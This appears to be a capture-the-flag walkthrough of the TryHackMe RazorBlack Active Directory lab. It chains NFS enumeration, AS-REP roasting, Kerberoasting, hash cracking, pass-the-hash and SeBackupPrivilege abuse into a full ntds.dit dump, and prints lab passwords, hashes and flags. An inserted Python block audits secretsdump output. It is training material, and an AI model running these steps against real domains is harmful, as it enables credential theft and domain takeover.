xchg2pwn



Reversing and exploit development enthusiast



TryHackMe

RazorBlack



Enumeration


We start by port-scanning the machine with nmap. It turns up a number of open ports, all of them typical of an Active Directory domain controller.

❯ nmap 10.10.235.231
Nmap scan report for 10.10.235.231
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
111/tcp   open  rpcbind
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
2049/tcp  open  nfs
3268/tcp  open  globalcatLDAP
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49667/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49671/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49678/tcp open  unknown
49693/tcp open  unknown

With crackmapexec we can make an SMB-level request that returns, besides the machine name, the domain the hosts are joined to.

❯ crackmapexec smb 10.10.235.231
SMB         10.10.235.231   445    HAVEN-DC         [*] Windows 10.0 Build 17763 x64 (name:HAVEN-DC) (domain:raz0rblack.thm) (signing:True) (SMBv1:False)  

For later attacks, or simply for convenience, we add the domain to /etc/hosts so that the domain name resolves to the machine.

❯ echo "10.10.235.231 raz0rblack.thm" | sudo tee -a /etc/hosts  

Port 2049 is open, so we can list every NFS export on the machine with showmount. There is one named /users that is exported to everyone.

❯ showmount -e raz0rblack.thm
Export list for raz0rblack.thm:  
/users (everyone)

With mount, as root, we can mount the /users export on /mnt.

❯ sudo mount raz0rblack.thm:/users /mnt/  

Now, as root, we list the files in /mnt. We find a txt containing what looks like a flag, plus an Excel xlsx file.

/mnt ❯ ls
 employee_status.xlsx   sbradley.txt  

❯ cat sbradley.txt
THM{ab53e05c9a98def00314a14ccbfa8104}  

The Excel file simply contains a list of users and their roles.

A common username convention is first initial plus surname; for example, Daven Port simply becomes dport.

❯ cat users.txt  
dport
iroyce
tvidal
aedwards
cingram
ncassidy
rzaydan
lvetrova
rdelgado
twilliams
sbradley
clin

With this list of users we can check with kerbrute which ones are valid at the domain level. This reduces our list to just 3 valid users.

❯ kerbrute userenum -d raz0rblack.thm --dc raz0rblack.thm users.txt  

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/


>  Using KDC(s):
>   raz0rblack.thm:88

>  [+] VALID USERNAME:       twilliams@raz0rblack.thm
>  [+] VALID USERNAME:       lvetrova@raz0rblack.thm
>  [+] VALID USERNAME:       sbradley@raz0rblack.thm
>  Done! Tested 12 usernames (3 valid) in 0.160 seconds

❯ cat users.txt  
lvetrova
twilliams
sbradley

Having a list of valid users, we can try an ASREPRoast attack to see whether any of them is vulnerable. Doing so, twilliams returns his hash.

❯ impacket-GetNPUsers raz0rblack.thm/ -no-pass -usersfile users.txt
Impacket v0.11.0 - Copyright 2023 Fortra

[-] User lvetrova doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$twilliams@RAZ0RBLACK.THM:fbc529788a44ef5c2609713e70f56267$cd563030f0ce7cda49a891e0ece22c039e77a97763c4286dffa642976a0b2e5582ad6d98eacda2c2c24264a8af7ce122f7f97a129a5be7331e307a563b85d63e1cf602ddd19abeae347e92bc9c5a40e81752dd308ba69e3a8feaa3a271b2ea53270700781d3557f1155f3b7a5eb87655cbfd3ba641a278ea948b80b58c4ecbb832f0b17c24a2ee42b620d8a0cccca200c4e3f50b88dec411f9e1055d73d2e779a9e424c1c3d59b1680514c0aff4671e0a459ef59783546875869374d3beb4a23cc839ed94272b6577cd89b715db9014b888fb3f31b213597bf6b7aaa23055a70182eab6579993337a647439f7b15e1d1  
[-] User sbradley doesn't have UF_DONT_REQUIRE_PREAUTH set

We can crack it easily with john and see twilliams' password.

❯ john -w:/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 XOP 4x2])  
Press 'q' or Ctrl-C to abort, almost any other key for status
roastpotatoes    ($krb5asrep$23$twilliams@RAZ0RBLACK.THM)
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

We confirm with crackmapexec that the credentials are valid and list the SMB shares. We have read permission on some of the default shares.

❯ crackmapexec smb raz0rblack.thm -u twilliams -p roastpotatoes --shares
SMB         raz0rblack.thm  445    HAVEN-DC         [*] Windows 10.0 Build 17763 x64 (name:HAVEN-DC) (domain:raz0rblack.thm) (signing:True) (SMBv1:False)  
SMB         raz0rblack.thm  445    HAVEN-DC         [+] raz0rblack.thm\twilliams:roastpotatoes 
SMB         raz0rblack.thm  445    HAVEN-DC         [+] Enumerated shares
SMB         raz0rblack.thm  445    HAVEN-DC         Share           Permissions     Remark
SMB         raz0rblack.thm  445    HAVEN-DC         -----           -----------     ------
SMB         raz0rblack.thm  445    HAVEN-DC         ADMIN$                          Remote Admin
SMB         raz0rblack.thm  445    HAVEN-DC         C$                              Default share
SMB         raz0rblack.thm  445    HAVEN-DC         IPC$            READ            Remote IPC
SMB         raz0rblack.thm  445    HAVEN-DC         NETLOGON        READ            Logon server share 
SMB         raz0rblack.thm  445    HAVEN-DC         SYSVOL          READ            Logon server share 
SMB         raz0rblack.thm  445    HAVEN-DC         trash                           Files Pending for deletion


Access - sbradley


We can try that password against the other users. For sbradley the server does not report an incorrect password but an error saying the password must be changed.

❯ crackmapexec smb raz0rblack.thm -u users.txt -p roastpotatoes --continue-on-success
SMB         raz0rblack.thm  445    HAVEN-DC         [*] Windows 10.0 Build 17763 x64 (name:HAVEN-DC) (domain:raz0rblack.thm) (signing:True) (SMBv1:False)  
SMB         raz0rblack.thm  445    HAVEN-DC         [-] raz0rblack.thm\lvetrova:roastpotatoes STATUS_LOGON_FAILURE 
SMB         raz0rblack.thm  445    HAVEN-DC         [+] raz0rblack.thm\twilliams:roastpotatoes 
SMB         raz0rblack.thm  445    HAVEN-DC         [-] raz0rblack.thm\sbradley:roastpotatoes STATUS_PASSWORD_MUST_CHANGE

We use smbpasswd to change the current password to something easy such as password123. sbradley's password is changed successfully.

❯ impacket-smbpasswd raz0rblack.thm/sbradley:roastpotatoes@10.10.235.231 -newpass password123  
Impacket v0.11.0 - Copyright 2023 Fortra

[!] Password is expired, trying to bind with a null session.
[*] Password was changed successfully.

We check with crackmapexec and it reports the credentials are correct. Among the SMB shares we can see we now have read access to trash.

❯ crackmapexec smb raz0rblack.thm -u sbradley -p password123 --shares
SMB         raz0rblack.thm  445    HAVEN-DC         [*] Windows 10.0 Build 17763 x64 (name:HAVEN-DC) (domain:raz0rblack.thm) (signing:True) (SMBv1:False)  
SMB         raz0rblack.thm  445    HAVEN-DC         [+] raz0rblack.thm\sbradley:password123 
SMB         raz0rblack.thm  445    HAVEN-DC         [+] Enumerated shares
SMB         raz0rblack.thm  445    HAVEN-DC         Share           Permissions     Remark
SMB         raz0rblack.thm  445    HAVEN-DC         -----           -----------     ------
SMB         raz0rblack.thm  445    HAVEN-DC         ADMIN$                          Remote Admin
SMB         raz0rblack.thm  445    HAVEN-DC         C$                              Default share
SMB         raz0rblack.thm  445    HAVEN-DC         IPC$            READ            Remote IPC
SMB         raz0rblack.thm  445    HAVEN-DC         NETLOGON        READ            Logon server share 
SMB         raz0rblack.thm  445    HAVEN-DC         SYSVOL          READ            Logon server share 
SMB         raz0rblack.thm  445    HAVEN-DC         trash           READ            Files Pending for deletion

We connect to the trash share with smbclient, where we find several files. With mget we can simply download all of them.

❯ impacket-smbclient raz0rblack.thm/sbradley:password123@10.10.235.231
Impacket v0.11.0 - Copyright 2023 Fortra

Type help for list of commands
# use trash
# ls
drw-rw-rw-          0  Tue Mar 16 02:01:28 2021 .
drw-rw-rw-          0  Tue Mar 16 02:01:28 2021 ..
-rw-rw-rw-       1340  Thu Feb 25 14:29:05 2021 chat_log_20210222143423.txt  
-rw-rw-rw-   18927164  Tue Mar 16 02:02:20 2021 experiment_gone_wrong.zip
-rw-rw-rw-         37  Sat Feb 27 14:24:21 2021 sbradley.txt
# mget *
[*] Downloading chat_log_20210222143423.txt
[*] Downloading experiment_gone_wrong.zip
[*] Downloading sbradley.txt
#

Let's read the txt files. The first shows a flag we had already seen; the second is a chat log between the Administrator user and sbradley.

❯ cat sbradley.txt
THM{ab53e05c9a98def00314a14ccbfa8104}

❯ cat chat_log_20210222143423.txt
sbradley> Hey Administrator our machine has the newly disclosed vulnerability for Windows Server 2019.
Administrator> What vulnerability??
sbradley> That new CVE-2020-1472 which is called ZeroLogon has released a new PoC.
Administrator> I have given you the last warning. If you exploit this on this Domain Controller as you did previously on our old Ubuntu server with dirtycow, I swear I will kill your WinRM-Access.  
sbradley> Hey you won't believe what I am seeing.
Administrator> Now, don't say that you ran the exploit.
sbradley> Yeah, The exploit works great it needs nothing like credentials. Just give it IP and domain name and it resets the Administrator pass to an empty hash.
sbradley> I also used some tools to extract ntds. dit and SYSTEM.hive and transferred it into my box. I love running secretsdump.py on those files and dumped the hash.
Administrator> I am feeling like a new cron has been issued in my body named heart attack which will be executed within the next minute.
Administrator> But, Before I die I will kill your WinRM access..........
sbradley> I have made an encrypted zip containing the ntds.dit and the SYSTEM.hive and uploaded the zip inside the trash share.
sbradley> Hey Administrator are you there ...
sbradley> Administrator .....

The administrator died after this incident.

Press F to pay respects


Shell - lvetrova


When we try to unzip the zip we downloaded earlier, it asks for a password.

❯ unzip experiment_gone_wrong.zip
Archive:  experiment_gone_wrong.zip
[experiment_gone_wrong.zip] system.hive password:  

With zip2john we can create a hash from the zip, and with john we obtain the password.

❯ zip2john experiment_gone_wrong.zip > hash

❯ john -w:/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hash  
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
electromagnetismo (experiment_gone_wrong.zip)
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Now that we have the password we can unzip the archive, which leaves us 2 files, system.hive and ntds.dit. Both contain important domain information.

❯ unzip experiment_gone_wrong.zip
Archive:  experiment_gone_wrong.zip
[experiment_gone_wrong.zip] system.hive password: electromagnetismo  
  inflating: system.hive
  inflating: ntds.dit

With secretsdump we can dump all the domain users' hashes locally. With a grep and awk one-liner we keep only the NT hashes, 1866 in total.

❯ impacket-secretsdump LOCAL -system system.hive -ntds ntds.dit > dump  

❯ grep ::: dump | awk '{print $4}' FS=':' > hashes.txt  

❯ wc -l hashes.txt
1866 hashes.txt
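The grep/awk one-liner above keeps field 4 of every `:::` line. The following is an added example (not from the original post) that does the same parsing in Python on a constructed secretsdump excerpt and, from a defender's point of view, reports what such a dump reveals: accounts with an empty password, accounts that still store an LM hash, and accounts sharing one NT hash (NT hashes are unsalted, so equal hashes mean equal passwords). All account names and hash values in the sample are made up except the two well-known constants.

```python
import re
from collections import defaultdict

# One NTDS line from secretsdump.py: domain\user:rid:lmhash:nthash:::
# The page's one-liner (grep ::: | awk '{print $4}' FS=':') keeps field 4, the NT hash.
SECRETSDUMP_LINE = re.compile(
    r"^(?P<user>[^:\s]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::",
    re.MULTILINE,
)

# Two well-known constants: the LM field when LM storage is disabled, and the
# NT hash of the empty password.
NO_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_PASSWORD_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample dump: account names and hashes are made up; only the two
# constants above are real values.
SAMPLE_DUMP = r"""[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HAVEN-DC$:1000:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
raz0rblack.thm\alice:1106:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
raz0rblack.thm\bob:1107:11223344556677889900aabbccddeeff:aaaabbbbccccddddeeeeffff00001111:::
raz0rblack.thm\carol:1108:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Kerberos keys from ntds.dit
Administrator:aes256-cts-hmac-sha1-96:00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff
[*] Cleaning up...
"""


def parse_secretsdump(text):
    """Return one dict (user, rid, lm, nt) per NTDS credential line in the output."""
    return [m.groupdict() for m in SECRETSDUMP_LINE.finditer(text)]


def unique_nt_hashes(text):
    """NT hashes in first-seen order, deduplicated (the page's wc -l counted duplicates too)."""
    seen = []
    for entry in parse_secretsdump(text):
        if entry["nt"] not in seen:
            seen.append(entry["nt"])
    return seen


def audit_dump(text):
    """Defender-side findings: empty passwords, LM hashes still stored, reuse, machine accounts."""
    entries = parse_secretsdump(text)
    by_nt = defaultdict(list)
    for e in entries:
        by_nt[e["nt"]].append(e["user"])
    return {
        "empty_password": [e["user"] for e in entries if e["nt"] == EMPTY_PASSWORD_NT],
        "lm_stored": [e["user"] for e in entries if e["lm"] != NO_LM_HASH],
        # Same NT hash on two accounts means the same password (NT hashes are unsalted).
        "reused": {nt: users for nt, users in by_nt.items()
                   if len(users) > 1 and nt != EMPTY_PASSWORD_NT},
        "machine_accounts": [e["user"] for e in entries if e["user"].endswith("$")],
    }


if __name__ == "__main__":
    print("\n".join(unique_nt_hashes(SAMPLE_DUMP)))
    for finding, value in audit_dump(SAMPLE_DUMP).items():
        print(f"{finding}: {value}")
```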

Of the 3 valid users we only lack lvetrova's password. With crackmapexec we can test whether any of the dumped hashes is valid for her, and we obtain her hash.

❯ crackmapexec smb raz0rblack.thm -u lvetrova -H hashes.txt
SMB         raz0rblack.thm  445    HAVEN-DC         [*] Windows 10.0 Build 17763 x64 (name:HAVEN-DC) (domain:raz0rblack.thm) (signing:True) (SMBv1:False)  
SMB         raz0rblack.thm  445    HAVEN-DC         [-] raz0rblack.thm\lvetrova:1afedc472d0fdfe07cd075d36804efd0 STATUS_LOGON_FAILURE 
SMB         raz0rblack.thm  445    HAVEN-DC         [-] raz0rblack.thm\lvetrova:31d6cfe0d16ae931b73c59d7e0c089c0 STATUS_LOGON_FAILURE 
SMB         raz0rblack.thm  445    HAVEN-DC         [-] raz0rblack.thm\lvetrova:42263cad4fc3f45816c340e684e2592a STATUS_LOGON_FAILURE 
.....................................................................................................................................
SMB         raz0rblack.thm  445    HAVEN-DC         [-] raz0rblack.thm\lvetrova:7b8b14a73d8a45249de2f5b0c225d515 STATUS_LOGON_FAILURE 
SMB         raz0rblack.thm  445    HAVEN-DC         [-] raz0rblack.thm\lvetrova:081af9630677a387f6f0a9bb17852602 STATUS_LOGON_FAILURE 
SMB         raz0rblack.thm  445    HAVEN-DC         [-] raz0rblack.thm\lvetrova:c184a72ed800899bc1ff633778a89b5e STATUS_LOGON_FAILURE 
SMB         raz0rblack.thm  445    HAVEN-DC         [+] raz0rblack.thm\lvetrova:f220d3988deb3f516c73f40ee16c431d

We can use it to authenticate to the machine as lvetrova via pass-the-hash. The authentication is valid for both SMB and WinRM.

❯ crackmapexec winrm raz0rblack.thm -u lvetrova -H f220d3988deb3f516c73f40ee16c431d
SMB         raz0rblack.thm  5985   HAVEN-DC         [*] Windows 10.0 Build 17763 (name:HAVEN-DC) (domain:raz0rblack.thm)
HTTP        raz0rblack.thm  5985   HAVEN-DC         [*] http://raz0rblack.thm:5985/wsman
WINRM       raz0rblack.thm  5985   HAVEN-DC         [+] raz0rblack.thm\lvetrova:f220d3988deb3f516c73f40ee16c431d (Pwn3d!)  

Now we simply connect with evil-winrm to get a PowerShell session.

❯ evil-winrm -i raz0rblack.thm -u lvetrova -H f220d3988deb3f516c73f40ee16c431d  
PS C:\Users\lvetrova\Documents> whoami
raz0rblack\lvetrova
PS C:\Users\lvetrova\Documents>

In her home directory we find an xml file named after her username. It contains a fairly long string, which is a credential serialized as a PSCredential.

PS C:\Users\lvetrova> dir

    Directory: C:\Users\lvetrova

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        9/15/2018  12:19 AM                Desktop
d-r---        2/25/2021  10:14 AM                Documents
d-r---        9/15/2018  12:19 AM                Downloads
d-r---        9/15/2018  12:19 AM                Favorites
d-r---        9/15/2018  12:19 AM                Links
d-r---        9/15/2018  12:19 AM                Music
d-r---        9/15/2018  12:19 AM                Pictures
d-----        9/15/2018  12:19 AM                Saved Games
d-r---        9/15/2018  12:19 AM                Videos
-a----        2/25/2021  10:16 AM           1692 lvetrova.xml

PS C:\Users\lvetrova> type lvetrova.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">Your Flag is here =></S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb010000009db56a0543f441469fc81aadb02945d20000000002000000000003660000c000000010000000069a026f82c590fa867556fe4495ca870000000004800000a0000000100000003b5bf64299ad06afde3fc9d6efe72d35500000002828ad79f53f3f38ceb3d8a8c41179a54dc94cab7b17ba52d0b9fc62dfd4a205f2bba2688e8e67e5cbc6d6584496d107b4307469b95eb3fdfd855abe27334a5fe32a8b35a3a0b6424081e14dc387902414000000e6e36273726b3c093bbbb4e976392a874772576d</SS>  
    </Props>
  </Obj>
</Objs>
PS C:\Users\lvetrova>

We can load the xml and get the credential into the $Cred variable. From it we select the UserName and Password values, and now we can see the flag.

PS C:\Users\lvetrova> $Cred = Import-Clixml -Path lvetrova.xml
PS C:\Users\lvetrova> $Cred.GetNetworkCredential() | Select UserName,Password  

UserName             Password
--------             --------
Your Flag is here => THM{694362e877adef0d85a92e6d17551fe4}

PS C:\Users\lvetrova>


Shell - xyan1d3


To enumerate privileges and domain information we can upload the SharpHound.ps1 module and import it into PowerShell to use its functions.

PS C:\Users\lvetrova\Documents> upload SharpHound.ps1

Info: Uploading SharpHound.ps1 to C:\Users\lvetrova\Documents\SharpHound.ps1  

Data: 1757460 bytes of 1757460 bytes copied

Info: Upload successful!

PS C:\Users\lvetrova\Documents> Import-Module .\SharpHound.ps1
PS C:\Users\lvetrova\Documents>

We invoke BloodHound asking it to collect everything. When it finishes it creates a zip with the collected information, which we can download with the download function.

PS C:\Users\lvetrova\Documents> Invoke-Bloodhound -CollectionMethod All
PS C:\Users\lvetrova\Documents> dir

    Directory: C:\Users\lvetrova\Documents

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        5/11/2023  10:04 PM          11661 20230511220419_BloodHound.zip
-a----        5/11/2023   9:46 PM        1318097 SharpHound.ps1

PS C:\Users\lvetrova\Documents> download 20230511220419_BloodHound.zip BH.zip

Info: Downloading C:\Users\lvetrova\Documents\20230511220419_BloodHound.zip to BH.zip  

Info: Download successful!

PS C:\Users\lvetrova\Documents>

We upload the zip to BloodHound and, listing the domain's kerberoastable accounts, we find the user xyan1d3 in addition to the usual default krbtgt.

We can use GetUserSPNs with lvetrova's credentials (or any of the 3 we have) to request the ticket and see xyan1d3's hash.

❯ impacket-GetUserSPNs raz0rblack.thm/lvetrova -hashes :f220d3988deb3f516c73f40ee16c431d -request
Impacket v0.11.0 - Copyright 2023 Fortra

ServicePrincipalName                   Name     MemberOf                                                    PasswordLastSet             LastLogon  Delegation 
-------------------------------------  -------  ----------------------------------------------------------  --------------------------  ---------  ----------
HAVEN-DC/xyan1d3.raz0rblack.thm:60111  xyan1d3  CN=Remote Management Users,CN=Builtin,DC=raz0rblack,DC=thm  2021-02-23 10:17:17.715160                 

$krb5tgs$23$*xyan1d3$RAZ0RBLACK.THM$raz0rblack.thm/xyan1d3*$76f40957d6006a44aff9be824bb11b50$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  

Using john we can crack the hash easily and see xyan1d3's password.

❯ john -w:/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])  
Press 'q' or Ctrl-C to abort, almost any other key for status
cyanide9amine5628 (?)
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

We check the credentials with crackmapexec and they are valid for both SMB and WinRM.

❯ crackmapexec smb raz0rblack.thm -u xyan1d3 -p cyanide9amine5628
SMB         raz0rblack.thm  445    HAVEN-DC         [*] Windows 10.0 Build 17763 x64 (name:HAVEN-DC) (domain:raz0rblack.thm) (signing:True) (SMBv1:False)  
SMB         raz0rblack.thm  445    HAVEN-DC         [+] raz0rblack.thm\xyan1d3:cyanide9amine5628 

❯ crackmapexec winrm raz0rblack.thm -u xyan1d3 -p cyanide9amine5628
SMB         raz0rblack.thm  5985   HAVEN-DC         [*] Windows 10.0 Build 17763 (name:HAVEN-DC) (domain:raz0rblack.thm)
HTTP        raz0rblack.thm  5985   HAVEN-DC         [*] http://raz0rblack.thm:5985/wsman
WINRM       raz0rblack.thm  5985   HAVEN-DC         [+] raz0rblack.thm\xyan1d3:cyanide9amine5628 (Pwn3d!)

Again we can connect to the machine with evil-winrm and get a shell.

❯ evil-winrm -i raz0rblack.thm -u xyan1d3 -p cyanide9amine5628  
PS C:\Users\xyan1d3\Documents> whoami
raz0rblack\xyan1d3
PS C:\Users\xyan1d3\Documents>

Again we find an xml; we just repeat the procedure to see the flag.

PS C:\Users\xyan1d3> dir

    Directory: C:\Users\xyan1d3

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        9/15/2018  12:19 AM                Desktop
d-r---        2/25/2021   9:34 AM                Documents
d-r---        9/15/2018  12:19 AM                Downloads
d-r---        9/15/2018  12:19 AM                Favorites
d-r---        9/15/2018  12:19 AM                Links
d-r---        9/15/2018  12:19 AM                Music
d-r---        9/15/2018  12:19 AM                Pictures
d-----        9/15/2018  12:19 AM                Saved Games
d-r---        9/15/2018  12:19 AM                Videos
-a----        2/25/2021   9:33 AM           1826 xyan1d3.xml

PS C:\Users\xyan1d3> type xyan1d3.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">Nope your flag is not here</S>
      <SS N="Password">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</SS>  
    </Props>
  </Obj>
</Objs>
PS C:\Users\xyan1d3> $Cred = Import-Clixml -Path xyan1d3.xml
PS C:\Users\xyan1d3> $Cred.GetNetworkCredential() | Select UserName,Password

UserName                   Password
--------                   --------
Nope your flag is not here LOL here it is -> THM{62ca7e0b901aa8f0b233cade0839b5bb}  

PS C:\Users\xyan1d3>


Shell - Administrator


Among the user's privileges we can see SeBackupPrivilege enabled. The exploitation will be exactly the same as in the XEN endgame.

PS C:\Users\xyan1d3> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======  
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

PS C:\Users\xyan1d3>

However, we do not have a fully interactive console to use diskshadow, so we create a txt with all the commands it will execute.

❯ cat cmd.txt
set context persistent nowriters 
add volume C: alias xyz 
set metadata C:\ProgramData\xyz.cab 
create 
expose %xyz% X: 

We upload the txt and run diskshadow with the /s parameter pointing at the file. It executes the commands we defined to create the xyz shadow copy and expose it as X:.

PS C:\ProgramData> diskshadow /s cmd.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  HAVEN-DC,  5/11/2023 10:09:10 PM

-> set context persistent nowriters
-> add volume C: alias xyz
-> set metadata C:\ProgramData\xyz.cab
-> create
Alias xyz for shadow ID {c93ddbda-2e97-4022-bbcb-d481ee4414c0} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {8d6f4001-e40e-473a-ade5-21a2857c9eb6} set as environment variable.  

Querying all shadow copies with the shadow copy set ID {8d6f4001-e40e-473a-ade5-21a2857c9eb6}

	* Shadow copy ID = {c93ddbda-2e97-4022-bbcb-d481ee4414c0}		%xyz%
		- Shadow copy set: {8d6f4001-e40e-473a-ade5-21a2857c9eb6}	%VSS_SHADOW_SET%
		- Original count of shadow copies = 1
		- Original volume name: \\?\Volume{115c1f55-0000-0000-0000-602200000000}\ [C:\]
		- Creation time: 5/11/2023 10:09:14 PM
		- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
		- Originating machine: HAVEN-DC.raz0rblack.thm
		- Service machine: HAVEN-DC.raz0rblack.thm
		- Not exposed
		- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
		- Attributes:  No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %xyz% X:
-> %xyz% = {c93ddbda-2e97-4022-bbcb-d481ee4414c0}
The shadow copy was successfully exposed as X:\.
->
PS C:\ProgramData>

With the upload function built into evil-winrm we can upload a pair of DLLs that help exploit this privilege; afterwards we import them as modules.

PS C:\ProgramData> upload SeBackupPrivilegeUtils.dll

Info: Uploading SeBackupPrivilegeUtils.dll to C:\ProgramData\SeBackupPrivilegeUtils.dll

Data: 21844 bytes of 21844 bytes copied

Info: Upload successful!

PS C:\ProgramData> upload SeBackupPrivilegeCmdLets.dll

Info: Uploading SeBackupPrivilegeCmdLets.dll to C:\ProgramData\SeBackupPrivilegeCmdLets.dll  

Data: 16384 bytes of 16384 bytes copied

Info: Upload successful!

PS C:\ProgramData> Import-Module .\SeBackupPrivilegeUtils.dll
PS C:\ProgramData> Import-Module .\SeBackupPrivilegeCmdLets.dll
PS C:\ProgramData>

Now we copy, from the shadow copy reachable through the X: drive, the ntds.dit file (which contains the hashes of every domain user) and the SYSTEM hive.

PS C:\ProgramData> Copy-FileSeBackupPrivilege X:\Windows\NTDS\ntds.dit ntds.dit
PS C:\ProgramData> Copy-FileSeBackupPrivilege X:\Windows\System32\Config\SYSTEM SYSTEM  
PS C:\ProgramData>

We can connect with impacket's smbclient and, through the C$ share, enter the ProgramData folder where our files are and download them with get.

❯ impacket-smbclient raz0rblack.thm/xyan1d3:cyanide9amine5628@10.10.235.231  
Impacket v0.11.0 - Copyright 2023 Fortra

Type help for list of commands
# use C$
# cd ProgramData
# get SYSTEM
# get ntds.dit
#

Now, locally with impacket's secretsdump, we pass the SYSTEM and ntds.dit we downloaded and dump all the domain hashes.

❯ impacket-secretsdump LOCAL -system SYSTEM -ntds ntds.dit
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0xf1582a79dd00631b701d3d15e75e59f6
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: f6162bb347993035d66a15417d73a667
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9689931bed40ca5a2ce1218210177f0c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HAVEN-DC$:1000:aad3b435b51404eeaad3b435b51404ee:0ae0e528447968f809c68e7d7363bd8d:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fa3c456268854a917bd17184c85b4fd1:::
raz0rblack.thm\xyan1d3:1106:aad3b435b51404eeaad3b435b51404ee:bf11a3cbefb46f7194da2fa190834025:::
raz0rblack.thm\lvetrova:1107:aad3b435b51404eeaad3b435b51404ee:f220d3988deb3f516c73f40ee16c431d:::
raz0rblack.thm\sbradley:1108:aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da:::
raz0rblack.thm\twilliams:1109:aad3b435b51404eeaad3b435b51404ee:351c839c5e02d1ed0134a383b628426e:::
[*] Kerberos keys from ntds.dit 
Administrator:aes256-cts-hmac-sha1-96:ab77c0dd6f5a28b63c4ae5f0eb89ad48f3ed43d52dc42f1dca2e99d8fc9cdbbf
Administrator:aes128-cts-hmac-sha1-96:81a749369e929b7f1731489b12a49df8
Administrator:des-cbc-md5:d3b646b65bceb5c7
HAVEN-DC$:aes256-cts-hmac-sha1-96:c060b6e232cb8055b2b032db367fefd4526c949be19846526a734dda83f1fb1a
HAVEN-DC$:aes128-cts-hmac-sha1-96:ee6f53f26d3d8ed81d59d7eda1d3ea2c
HAVEN-DC$:des-cbc-md5:34fb7c15102ce6b3
krbtgt:aes256-cts-hmac-sha1-96:eed4acbdf1b6cc2b3c1aef992a8cea74d8b0c4ad5b4deecf47c57c4d9465caf5
krbtgt:aes128-cts-hmac-sha1-96:3dbbd202aa0343d1b8df99785d2befbb
krbtgt:des-cbc-md5:857a46f13e91eae3
raz0rblack.thm\xyan1d3:aes256-cts-hmac-sha1-96:6de380d21ae165f55e7520ee3c4a81417bf6a25b17f72ce119083846d89a031f
raz0rblack.thm\xyan1d3:aes128-cts-hmac-sha1-96:9f5a0114b2c18ea63a32a1b8553d4f61
raz0rblack.thm\xyan1d3:des-cbc-md5:e9a1a46223cd8975
